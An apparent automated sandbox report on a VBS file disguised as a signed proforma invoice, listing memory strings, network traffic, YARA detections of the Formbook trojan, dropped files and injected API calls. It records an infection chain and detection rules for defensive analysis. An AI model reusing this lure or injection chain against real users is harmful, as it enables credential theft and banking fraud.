            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
            Source: powershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
            Source: explorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
            Source: wscript.exe, 00000000.00000003.1669979049.000001D666A2F000.00000004.00000020.00020000.00000000.sdmp, Signed Proforma Invoice 3645479_pdf.vbsString found in binary or memory: https://lesferch.github.io/DesktopPic
            Source: wscript.exe, 00000000.00000002.1672124633.000001D6672BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D6672BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfS
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: colorcpl.exe, 00000008.00000003.1893364036.0000000006202000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
            Source: explorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
            Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49672
            Source: unknown HTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.45.138:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49733 version: TLS 1.2

            E-Banking Fraud

            Source: Yara match File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: C:\Windows\SysWOW64\colorcpl.exe Dropped file: C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogri.ini
            Source: C:\Windows\SysWOW64\colorcpl.exe Dropped file: C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogrv.ini
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.2943761942.000000000B429000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
            Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: powershell.exe PID: 6236, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: MSBuild.exe PID: 7004, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: colorcpl.exe PID: 4584, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Signed Proforma Invoice 3645479_pdf.vbs Static file information: Suspicious name
            Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 9154
            Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041A350 NtCreateFile,5_2_0041A350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041A400 NtReadFile,5_2_0041A400
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041A480 NtClose,5_2_0041A480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041A530 NtAllocateVirtualMemory,5_2_0041A530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041A47A NtClose,5_2_0041A47A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2B60 NtClose,LdrInitializeThunk,5_2_013C2B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_013C2BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2AD0 NtReadFile,LdrInitializeThunk,5_2_013C2AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_013C2D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_013C2D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_013C2DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2DD0 NtDelayExecution,LdrInitializeThunk,5_2_013C2DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_013C2C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_013C2CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2F30 NtCreateSection,LdrInitializeThunk,5_2_013C2F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2FB0 NtResumeThread,LdrInitializeThunk,5_2_013C2FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2F90 NtProtectVirtualMemory,LdrInitializeThunk,5_2_013C2F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2FE0 NtCreateFile,LdrInitializeThunk,5_2_013C2FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_013C2EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_013C2E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C3010 NtOpenDirectoryObject,5_2_013C3010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C3090 NtSetValueKey,5_2_013C3090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C4340 NtSetContextThread,5_2_013C4340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C35C0 NtCreateMutant,5_2_013C35C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C4650 NtSuspendThread,5_2_013C4650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C39B0 NtGetContextThread,5_2_013C39B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2BA0 NtEnumerateValueKey,5_2_013C2BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2B80 NtQueryInformationFile,5_2_013C2B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2BE0 NtQueryValueKey,5_2_013C2BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2AB0 NtWaitForSingleObject,5_2_013C2AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2AF0 NtWriteFile,5_2_013C2AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C3D10 NtOpenProcessToken,5_2_013C3D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2D00 NtSetInformationFile,5_2_013C2D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C3D70 NtOpenThread,5_2_013C3D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2DB0 NtEnumerateKey,5_2_013C2DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2C00 NtQueryInformationProcess,5_2_013C2C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2C60 NtCreateKey,5_2_013C2C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2CF0 NtOpenProcess,5_2_013C2CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2CC0 NtQueryVirtualMemory,5_2_013C2CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2F60 NtCreateProcessEx,5_2_013C2F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2FA0 NtQuerySection,5_2_013C2FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2E30 NtWriteVirtualMemory,5_2_013C2E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2EE0 NtQueueApcThread,5_2_013C2EE0
            Source: C:\Windows\explorer.exeCode function: 6_2_0B412E12 NtProtectVirtualMemory,6_2_0B412E12
            Source: C:\Windows\explorer.exeCode function: 6_2_0B411232 NtCreateFile,NtReadFile,6_2_0B411232
            Source: C:\Windows\explorer.exeCode function: 6_2_0B412E0A NtProtectVirtualMemory,6_2_0B412E0A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051535C0 NtCreateMutant,LdrInitializeThunk,8_2_051535C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152D10 NtMapViewOfSection,LdrInitializeThunk,8_2_05152D10
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152D00 NtSetInformationFile,LdrInitializeThunk,8_2_05152D00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152DD0 NtDelayExecution,LdrInitializeThunk,8_2_05152DD0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_05152DF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_05152C70
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152C60 NtCreateKey,LdrInitializeThunk,8_2_05152C60
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_05152CA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152F30 NtCreateSection,LdrInitializeThunk,8_2_05152F30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152FE0 NtCreateFile,LdrInitializeThunk,8_2_05152FE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_05152EA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152B60 NtClose,LdrInitializeThunk,8_2_05152B60
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_05152BA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_05152BF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152BE0 NtQueryValueKey,LdrInitializeThunk,8_2_05152BE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152AD0 NtReadFile,LdrInitializeThunk,8_2_05152AD0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152AF0 NtWriteFile,LdrInitializeThunk,8_2_05152AF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05154650 NtSuspendThread,8_2_05154650
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05153010 NtOpenDirectoryObject,8_2_05153010
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05153090 NtSetValueKey,8_2_05153090
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05154340 NtSetContextThread,8_2_05154340
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05153D10 NtOpenProcessToken,8_2_05153D10
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152D30 NtUnmapViewOfSection,8_2_05152D30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05153D70 NtOpenThread,8_2_05153D70
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152DB0 NtEnumerateKey,8_2_05152DB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152C00 NtQueryInformationProcess,8_2_05152C00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152CC0 NtQueryVirtualMemory,8_2_05152CC0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152CF0 NtOpenProcess,8_2_05152CF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152F60 NtCreateProcessEx,8_2_05152F60
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152F90 NtProtectVirtualMemory,8_2_05152F90
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152FB0 NtResumeThread,8_2_05152FB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152FA0 NtQuerySection,8_2_05152FA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152E30 NtWriteVirtualMemory,8_2_05152E30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152E80 NtReadVirtualMemory,8_2_05152E80
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152EE0 NtQueueApcThread,8_2_05152EE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051539B0 NtGetContextThread,8_2_051539B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152B80 NtQueryInformationFile,8_2_05152B80
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152AB0 NtWaitForSingleObject,8_2_05152AB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4A350 NtCreateFile,8_2_02F4A350
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4A480 NtClose,8_2_02F4A480
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4A400 NtReadFile,8_2_02F4A400
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4A530 NtAllocateVirtualMemory,8_2_02F4A530
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4A47A NtClose,8_2_02F4A47A
            Source: Signed Proforma Invoice 3645479_pdf.vbs Initial sample: Strings found which are bigger than 50
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
